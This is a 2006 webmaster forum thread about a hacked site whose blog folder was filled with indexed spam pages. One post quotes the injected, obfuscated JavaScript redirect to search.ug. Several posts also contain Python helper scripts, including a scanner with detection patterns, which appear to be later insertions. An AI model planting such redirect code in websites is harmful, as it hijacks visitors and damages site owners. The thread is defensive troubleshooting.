Google Search Results: Thousands Of Pages I Never Made + search.ug
I am posting here because I do not know how to fix the problem I am having with my website: Frenchtowner.com (http://www.frenchtowner.com/).
Doing a site search on my website, Google is showing that I have 216,000 pages indexed. That would be fabulous if I actually had that many pages, but I only have about 334. These 215,666 fake spam pages are about subjects I never write about or even care about.
I am not alone in this situation. In my limited research, I have found many other sites with this same problem. Many of these sites are non-profit foundation websites, and one is even a municipal website.
I have gone through all of my directories of the site and deleted all the suspect files that I can find, and changed permissions on directories also. Earlier this week, there were only a few thousand fake pages, and now they are multiplying like rats.
I do not want this problem to affect my google ranking, but I do not know what to do. I would appreciate any help that any one can offer. It would also be great to know how this happens technically.
I should note that this spam attack sometimes redirects to a domain: search.ug and other similar sites around the world. I fixed that part of this problem some time ago, but I cannot make any headway with this last part.
One other note, these fake pages are not showing on Yahoo or MSN.
Sincerely,
JVJ
JohnW
08-26-2006, 08:13 PM
>I do not want this problem to affect my google ranking
Unfortunately it probably will. From the limited information, it could be a cloaking job done on Google's IP address range. For something like that to be set up, either your hosting company is playing games or has been compromised, or someone has gained access to your site, if that's what's going on. Post the url if you want to.
John,
Thanks for responding. I know that someone gained access to my site. They uploaded .htaccess files and others that I removed. These were the ones doing the redirects. Honestly I did that months ago and I thought the problem was fixed. This week I just did a check and found that the situation had gotten worse. That is when I changed permissions on the files. A few days later Google showed that I had even more spam junk pages.
In trying to fix this, I even wrote the owner of the search.ug site. He suggested that I had been compromised, but he did not admit (surprise-surprise) that he had hacked my site. It does not make sense to me however that someone would go to all this trouble to hack thousands of sites to send traffic to a website that they were not associated with.
I can supply a list of sites that have been compromised, but I do not want to hurt any of these websites by listing them here, especially since some are for non-profits.
JohnW
08-26-2006, 10:01 PM
Have you thought about using the Google url removal tool? It might not be too late.
Chris Boggs
08-26-2006, 10:33 PM
yeah agreed with John...sign up for G webmaster tools (https://www.google.com/webmasters/sitemaps/docs/en/about.html) immediately, and if you do notice trouble you should be able to submit a reinclusion. Make sure you use "victim of cloaking/redirect," or something like that in the subject to get their attention.
Marcia
08-27-2006, 02:11 AM
JVJ, do you use a hosting company or host the site yourself? If it's a hosting company, have you notified them of this happening? It sounds like the server may have been compromised (which has been happening to others lately) and if that's so, if it's shared hosting there may be other sites experiencing the same thing and if it's a "good" host they may be able to fix any holes that may exist.
Is there any pattern to the pages added that aren't yours, and can you give an example or two of what isn't yours?
Added:
It looks like you're not alone with this:
Google search for search.ug (http://www.google.com/search?sourceid=navclient&ie=UTF-8&rls=GGLD,GGLD:2005-11,GGLD:en&q=search%2Eug)
site:search.ug (http://www.google.com/search?hl=en&lr=&safe=off&rls=GGLD%2CGGLD%3A2005-11%2CGGLD%3Aen&q=site%3Asearch.ug&btnG=Search)
Marcia
08-27-2006, 03:54 AM
And more:
The links to sites on the search pages at search.ug are being run through go.php? but using an IP number (66.230.182.46) rather than domain name. Here's what turns up at Sam Spade for that IP
Server Used: [ whois.arin.net ]
66.230.182.46 = [ ]
OrgName: ISPrime Inc.
OrgID: IPRM
Address: 25 Broadway
Address: 6th Floor Suite 2
City: New York
StateProv: NY
PostalCode: 10004-1086
Country: US
NetRange: 66.230.128.0 - 66.230.191.255
CIDR: 66.230.128.0/18
NetName: NET-66-230-128-0-1
NetHandle: NET-66-230-128-0-1
Parent: NET-66-0-0-0-0
NetType: Direct Allocation
NameServer: NS.ISPRIME.COM
NameServer: NS2.ISPRIME.COM
Comment: ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
RegDate: 2002-02-15
Updated: 2004-06-04
RAbuseHandle: ISPRI1-ARIN
RAbuseName: ISPrime Abuse
RAbusePhone: 1-212-812-9028
RAbuseEmail: abuse@isprime.com
RNOCHandle: ISPRI-ARIN
RNOCName: ISPrime NOC
RNOCPhone: 1-212-812-9028
RNOCEmail: noc@isprime.com
RTechHandle: ITS7-ARIN
RTechName: ISPrime Technical Support
RTechPhone: 1-212-812-9028
RTechEmail: support@isprime.com
OrgAbuseHandle: ISPRI1-ARIN
OrgAbuseName: ISPrime Abuse
OrgAbusePhone: 1-212-812-9028
OrgAbuseEmail: abuse@isprime.com
OrgNOCHandle: ISPRI-ARIN
OrgNOCName: ISPrime NOC
OrgNOCPhone: 1-212-812-9028
OrgNOCEmail: noc@isprime.com
OrgTechHandle: ITS7-ARIN
OrgTechName: ISPrime Technical Support
OrgTechPhone: 1-212-812-9028
OrgTechEmail: support@isprime.com
ARIN WHOIS database last updated 2006-08-26 19:10
Enter ? for additional hints on searching ARIN's WHOIS database. http://www.samspade.org/t/ipwhois?a=66.230.182.46
==================================
When pinging search.ug the IP number appears to be 88.151.113.7 - but information doesn't seem to be available through a Sam Spade search. However, typing the web address into the browser by IP, this is what we arrive at:
http://88.151.113.7/
A search by IP at www.ripe.net brings up this information about that IP (http://www.ripe.net/whois?form_type=advanced&full_query_string=&searchtext=88.151.113.7&do_search=Search&reverse_delegation_domains=ON&inverse_attributes=None&ip_search_lvl=Default%28nearest+match%29&alt_database=RIPE&object_type=All)
% Information related to '88.151.112.0 - 88.151.115.255'
inetnum: 88.151.112.0 - 88.151.115.255
netname: GOLDENNET
descr: LLC "Golden Internet"
country: RU
admin-c: GOLD4-RIPE
tech-c: GOLD4-RIPE
status: ASSIGNED PA
remarks: ***************************************************************************
remarks: CONTACT ADDRESSES
remarks: ***************************************************************************
remarks: General information: info@goldeninternet.ru
remarks: Abuse: abuse-general@goldeninternet.ru
remarks: Spam: abuse-mail@goldeninternet.ru
remarks: Scans/Hacking attempts: abuse-hacking@goldeninternet.ru
remarks: IP delegation: ip@goldeninternet.ru
remarks: ***************************************************************************
remarks: Working hours: 9 am - 6 pm MSK/MSD (GMT+3/+4)
remarks: ***************************************************************************
mnt-by: GOLDENNET-MNT
mnt-routes: ABOVENET-MNT
mnt-routes: ABOVENET-P
source: RIPE # Filtered
role: GOLDEN INTERNET
address: 4 korp. 2 Kedrova str.
address: 117292, Moscow
address: Russian Federation
abuse-mailbox: abuse-general@goldeninternet.ru
admin-c: DSS21-RIPE
tech-c: SVK58-RIPE
nic-hdl: GOLD4-RIPE
mnt-by: GOLDENNET-MNT
source: RIPE # Filtered
% Information related to '88.151.112.0/22AS6461'
route: 88.151.112.0/22
descr: GoldenInternet
origin: AS6461
mnt-by: ABOVENET-P
source: RIPE # Filtered
==============
When navigating to individual pages on the site located at that IP, the links to companies on pages are being run through a jump script all using the IP in the URL rather than domain name. I think it's fairly safe to assume they're PPC links being obfuscated and tracked.
Note:
That does NOT necessarily mean that either of those two companies/entities above who the IP ranges belong to are directly involved with this or are even aware of it; my guess would be that they aren't, because there would be too much transparency. It's just a pit stop check of locations along the way related to what's happening.
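The two whois lookups above can be double-checked offline. This is only a minimal Python sketch: the addresses and CIDR blocks are copied from the ARIN and RIPE output quoted in this post, and the helper name in_block is made up for illustration. It confirms that each IP really falls inside the block whois reported, and prints the first and last address of each block.

```python
import ipaddress

# Address -> allocation, exactly as quoted in the whois output above.
ALLOCATIONS = {
    "66.230.182.46": "66.230.128.0/18",   # ARIN: ISPrime Inc.
    "88.151.113.7": "88.151.112.0/22",    # RIPE: GOLDENNET
}

def in_block(address, cidr):
    """Return True if the address lies inside the CIDR block."""
    return ipaddress.ip_address(address) in ipaddress.ip_network(cidr)

for address, cidr in ALLOCATIONS.items():
    network = ipaddress.ip_network(cidr)
    # network[0] and network[-1] are the first and last addresses of the block.
    print(address, "in", cidr, "->", in_block(address, cidr),
          f"({network[0]} - {network[-1]})")
```

As the note above says, this only shows whose address space the servers sit in, not who is behind the pages.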
=======================
Added: As a point of interest, here's info about the ug TLD:
http://en.wikipedia.org/wiki/.ug
Marcia,
First of all, thank you for your research and your suggestions. You have come up with some info. that I never found.
In response to your questions, see my answers below:
"JVJ, do you use a hosting company or host the site yourself?" If it's a hosting company, have you notified them of this happening?
I use a hosting company, and I have notified them. They told me to notify Google. I did that at the beginning of this fiasco, and never got a response.
"Is there any pattern to the pages added that aren't yours, and can you give an example or two of what isn't yours?"
Yes, there is a pattern. All of the non-existent spam junk pages listed for me are in the blog folder. Here are some of the Google Search Results for pages I never made:
gold miner se warez (http://www.frenchtowner.com/blog-frenchtown-nj/archives/gold-miner-se-warez.phtml)
gold miner se warez, sound forge 7 mp3 plugin activation code, worms armageddon -forums -demo download free warez.
www.frenchtowner.com/blog-frenchtown-nj/archives/gold-miner-se-warez.phtml - 9k - Supplemental Result - Cached - Similar pages
jenifer lopes photo (http://www.frenchtowner.com/blog-frenchtown-nj/jenifer-lopes-photo.phtml)
jenifer lopes photo, manga smartphone skins, Robotics 1806 drivers xp, free antivirus programm.
www.frenchtowner.com/blog-frenchtown-nj/jenifer-lopes-photo.phtml - 10k - Supplemental Result - Cached - Similar pages
DOWNBLOUSE.IT BACKDOOR (http://www.frenchtowner.com/blog-frenchtown-nj/DOWNBLOUSE.IT-BACKDOOR.phtml)
DOWNBLOUSE.IT BACKDOOR, alien shooter dawnload, kakadu source code BT, Wet - The Sexy Empire.rar download, opera Series60 crack, free downloade, ...
www.frenchtowner.com/blog-frenchtown-nj/DOWNBLOUSE.IT-BACKDOOR.phtml - 9k - Supplemental Result - Cached - Similar pages
%3C$BlogBacklinkURL$%3E (http://www.frenchtowner.com/blog-frenchtown-nj/2005/11/%3C$BlogBacklinkURL$%3E)
%3C$BlogBacklinkURL$%3E, counter strike trainer wallhack, winavi telecharger gratuite, webcam server, protect me 4.17 serial, keylogger to counter strike ...
www.frenchtowner.com/blog-frenchtown-nj/2005/11/%3C$BlogBacklinkURL$%3E - 9k - Supplemental Result - Cached - Similar pages
"It looks like you're not alone with this:"
No, I am not alone; there are other discussions on other forums:
Pro-Networks.org (http://www.pro-networks.org/forum/viewtopic.php?t=62756&postdays=0&postorder=asc&start=0&sid=77aa4c66228e272256c770032683f7f4)
and:
Google Groups: Webmaster Help (http://groups.google.off.ai/group/Google_Webmaster_Help-Indexing/browse_thread/thread/377cf6544807efce/09e2141e285bd293?lnk=st&q=search.ug&rnum=2&hl=en#09e2141e285bd293)
The search.ug redirect seems to work with a javascript:
<script language="JavaScript">
<!--
function ames() {
if(self.parent.frames.length != 0)
self.parent.location = document.location;
}
function gotopage(adress) {
if(adress != '') { window.location.href = adress; }
}
ames();
eval('windo'+'w.loc'+'at'+'ion='+'"ht'+'tp:'+'//'+'sea'+'rch'+'.ug'+'/?'+'cT1e'+'Xl5'+'zP'+'WVeX'+'l5kPQ=="');
// -->
</script>
I found this on one of my pages before I took the initial steps to correct the problem.
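For anyone trying to read the script above: the argument to eval() is an ordinary assignment chopped into small quoted fragments, presumably so that a plain text search for "search.ug" does not find it. The sketch below is a minimal Python example (the helper name deobfuscate_concat is made up for illustration) that joins the fragments back together without executing anything.

```python
import re

def deobfuscate_concat(expr):
    """Join the single-quoted fragments of a 'a'+'b'+... JavaScript expression."""
    fragments = re.findall(r"'([^']*)'", expr)
    return "".join(fragments)

# The eval() argument, copied from the script quoted above.
obfuscated = """'windo'+'w.loc'+'at'+'ion='+'"ht'+'tp:'+'//'+'sea'+'rch'+'.ug'+'/?'+'cT1e'+'Xl5'+'zP'+'WVeX'+'l5kPQ=="'"""

decoded = deobfuscate_concat(obfuscated)
print(decoded)
```

The joined string is a plain window.location assignment pointing at search.ug, which is the redirect described in this thread.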
Marcia
08-27-2006, 09:12 AM
The pages aren't up any more, but they're still cached, redirect and all.
"JVJ, do you use a hosting company or host the site yourself?" If it's a hosting company, have you notified them of this happening?
I use a hosting company, and I have notified them. They told me to notify Google. I did that at the beginning of this fiasco, and never got a response.
That isn't correct. First off, it's not even an issue for a Google spam report; that's for sites that are spamming, and you aren't.
Secondly and more important, it is definitely a hosting company's responsibility to look after security on the servers they run that folks have entrusted their sites to be hosted on. Security on their servers is not Google's job to do, it's theirs.
BTW, I looked by IP also and saw who you're hosting with and where the boxes are that they're using. If that's the response you got from contacting tech support, write again and *demand* that the case be escalated to 2nd Tier support. You might want to include links to the cache for the pages, while they're still in there.
You also might want to grab some screenshots of the pages in the cache - easily done using Opera browser, with which it's very quick and easy to disable Javascript if that's how the redirection is being done. You can also grab screenshots of the pages being redirected to.
Marcia,
I do have to take responsibility. I was the one who left my directories open with free for all chmod coding. I have now fixed that.
Maybe I am being dense, but I still do not understand how these spam pages are still listed on Google Search Results as being on my site, all leading to 404 pages, and how the number of them only increased after I fixed the permission codes. Is a 755 code not secure enough?
I think that my hosting company was saying that there was nothing that they could do to get the fake pages un-listed/de-listed on the Google Search Results.
Marcia
08-27-2006, 10:48 AM
I've read that it's up to the server admin to take security measures so that no user can over-ride the settings in the root but I'm no techie and only know what I read or ask about in a "surface" way.
I have found a page in the RedHat documentation that goes into what the different settings mean. The numerical explanations are found at the bottom of the page:
Here is a list of some common settings, numerical values and their meanings:
-rw------- (600) — Only the owner has read and write permissions.
-rw-r--r-- (644) — Only the owner has read and write permissions; the group and others have read only.
-rwx------ (700) — Only the owner has read, write, and execute permissions.
-rwxr-xr-x (755) — The owner has read, write, and execute permissions; the group and others have only read and execute.
-rwx--x--x (711) — The owner has read, write, and execute permissions; the group and others have only execute.
-rw-rw-rw- (666) — Everyone can read and write to the file. (Be careful with these permissions.)
-rwxrwxrwx (777) — Everyone can read, write, and execute. (Again, this permissions setting can be hazardous.)
Here are some common settings for directories:
drwx------ (700) — Only the user can read, write in this directory.
drwxr-xr-x (755) — Everyone can read the directory; users and groups have read and execute permissions.
Ownership and Permissions (http://www.redhat.com/docs/manuals/linux/RHL-9-Manual/getting-started-guide/s1-navigating-ownership.html)
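The numeric codes in the list above can also be decoded mechanically. This is a minimal sketch using Python's standard stat module; the helper names describe_mode and others_can_write are made up for illustration. It prints the ls-style string for a mode and reports whether "others" may write, which is the bit that matters for the "free for all" settings mentioned earlier.

```python
import stat

def describe_mode(mode, is_dir=False):
    """Render a numeric mode such as 0o755 in ls-style notation."""
    file_type = stat.S_IFDIR if is_dir else stat.S_IFREG
    return stat.filemode(file_type | mode)

def others_can_write(mode):
    """True when the 'others' class has the write bit set."""
    return bool(mode & stat.S_IWOTH)

for mode in (0o644, 0o755, 0o666, 0o777):
    print(oct(mode), describe_mode(mode), "world-writable:", others_can_write(mode))
```

With 755, only the owner has the write bit; group and others can read and enter the directory but cannot create or change files through those permissions. That says nothing about scripts or logins that run as the owner account, which would still be able to write.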
Marcia,
I did some other reading and it seems then that the 755 code should be fine.
Thanks for all of your help.
That still leaves us with the mystery of the ever increasing number of fake pages that all read as 404 error pages. I will put that in the next post, as a separate issue.
Since this problem is showing up in Google Search Results, I am posting this as a separate post since that is what this forum is about.
First of all, why do 404 error pages ever show up in Google Search Results?
Secondly, just how big is this problem? If my website has 215,000 of these pages listed, another website has 460,000 (http://groups.google.off.ai/group/Google_Webmaster_Help-Indexing/browse_thread/thread/377cf6544807efce/09e2141e285bd293?lnk=st&q=search.ug&rnum=2&hl=en#09e2141e285bd293), a non-profit I have told about this problem has 263,000, and a prominent classical music non-profit site has over 1,600,000 junk pages indexed, then we are talking about a major compromise of the Google SERPs.
That is in simple math terms:
MY SITE: 215,000
OTHER SITE: 460,000
NON-PROFIT SITE #1: 263,000
NON-PROFIT SITE #2: 1,600,000
======================================
TOTAL FAKE SPAM PAGES: 2,538,000
This is just for 4 websites. If a more in-depth investigation were done, what would the total number of useless, fake, junk spam pages be across the entire internet? I don't think Google wants this garbage in their search results. Is this a backdoor attack on Google itself? Is someone simply trying to damage the integrity of their results, and not so much to drive traffic to their own site(s)?
I am just trying to understand this all better.
JohnW
08-27-2006, 05:19 PM
>First of all, why do 404 error pages ever show up in Google Search Results?
It was not a 404 at the time that Google crawled it and cached it. These will hang around for a long time as supplemental results if you don’t remove them from G as previously described.
John,
These have been 404 pages for a long time. The last crawl, and update of my SERPS was earlier this week, when I went from thousands of junk pages to hundreds of thousands of junk pages. That is why somehow I think that there might still be some malicious code/file on my site that I cannot find.
By the way, here is the cached text from one of these junk pages. It is very interesting the way the page is made. It seems to be constructed of modules that are simply shifted around to make copies of itself to duplicate itself over and over again.
Here's a gif of the cached page from Google:
http://www.frenchtowner.com/m/spam-page-cached.gif
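If a leftover file is suspected, one way to look for it is to walk the site's directory tree and flag anything that matches what has turned up in this thread so far. The following is only a rough Python sketch under stated assumptions: the two patterns are taken from the script and domain quoted earlier, the function name scan_tree is made up, and a clean result does not prove the site is clean.

```python
import os
import re
import stat

# Hypothetical signatures, based only on what was quoted in this thread.
SUSPICIOUS_PATTERNS = [
    re.compile(r"eval\s*\(\s*'[^']*'\s*\+"),    # eval() fed a string built from fragments
    re.compile(r"search\.ug", re.IGNORECASE),   # the redirect target named above
]

def scan_tree(root):
    """Return (path, reason) pairs for entries under root that deserve a manual look."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            mode = os.lstat(path).st_mode
            if stat.S_ISLNK(mode):
                continue  # symlink modes are not meaningful here
            if mode & stat.S_IWOTH:
                findings.append((path, "world-writable"))
        for name in filenames:
            path = os.path.join(dirpath, name)
            if name == ".htaccess":
                findings.append((path, "review .htaccess"))
            try:
                with open(path, "r", errors="ignore") as handle:
                    text = handle.read(1_000_000)  # first ~1 MB is enough for a signature check
            except OSError:
                continue  # unreadable file: skip rather than abort the scan
            if any(pattern.search(text) for pattern in SUSPICIOUS_PATTERNS):
                findings.append((path, "suspicious script"))
    return findings

# Example (the path is a placeholder, not the real layout of any site):
# for path, reason in scan_tree("/path/to/public_html"):
#     print(reason, path)
```

Every .htaccess file is listed for review rather than judged, since legitimate ones exist too; the point is to see each one and compare it against what the site owner actually put there.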
JohnW
08-27-2006, 07:07 PM
>These have been 404 pages for a long time.
I looked at a few from your supplemental results. For example look at this one “free skins motorola e398” and see the cached date - Mar 24, 2006 04:51:48 GMT. This page may have been a 404 for 5 months, but because it’s supplemental it won’t get crawled very often and may not get crawled again by Gbot for a long while. G won’t see the 404 until the next time they try to crawl this page, and it will be some time after that before the page is removed automatically. If ever ;-)
I would just remove these pages with the tool like mentioned before and then focus on what you can do something about, which at this point is security. From what you have said you don’t seem convinced (or convincing) that you have solved the security problem.
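Before relying on the removal tool, it may be worth confirming what the server actually answers for a few of the junk URLs, since a crawler only learns a page is gone from the status code it receives. This is a minimal Python sketch using the standard urllib module; the function names fetch_status and crawler_verdict and the four verdict labels are made up for illustration.

```python
import urllib.error
import urllib.request

def fetch_status(url, timeout=10.0):
    """Return the HTTP status code the server sends for url (HEAD request).

    urlopen follows redirects, so the code is the one for the final URL.
    """
    request = urllib.request.Request(url, method="HEAD")
    try:
        with urllib.request.urlopen(request, timeout=timeout) as response:
            return response.status
    except urllib.error.HTTPError as err:
        return err.code  # 4xx and 5xx responses arrive as exceptions

def crawler_verdict(status):
    """Rough label for how a crawler would read the status code."""
    if status in (404, 410):
        return "gone"
    if 200 <= status < 300:
        return "live"
    if 300 <= status < 400:
        return "redirect"
    return "error"

# Example, using one of the URLs listed earlier in this thread:
# url = "http://www.frenchtowner.com/blog-frenchtown-nj/jenifer-lopes-photo.phtml"
# print(url, crawler_verdict(fetch_status(url)))
```

If any junk URL comes back as "live" or "redirect" instead of "gone", something on the server is still answering for it, which would point back at the security side rather than at the index.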
g1smd
08-28-2006, 05:42 PM
In their supplemental update just a week or so ago, Google cleaned up all old supplemental results from before 2005 December that represented URLs long ago deleted or redirected. Those are now gone from the index.
They have updated supplemental results for duplicate content where the duplicate URL still serves the content with a "200 OK" status. The URL now has a newer cache, but still supplemental.
This is the most important part:
They have created new supplemental results for any URL where the content has been edited, or deleted, or the URL newly redirected, in the last few months. The supplemental result represents the old content at that URL.
They will now hold that result for about one year before deleting it from the index.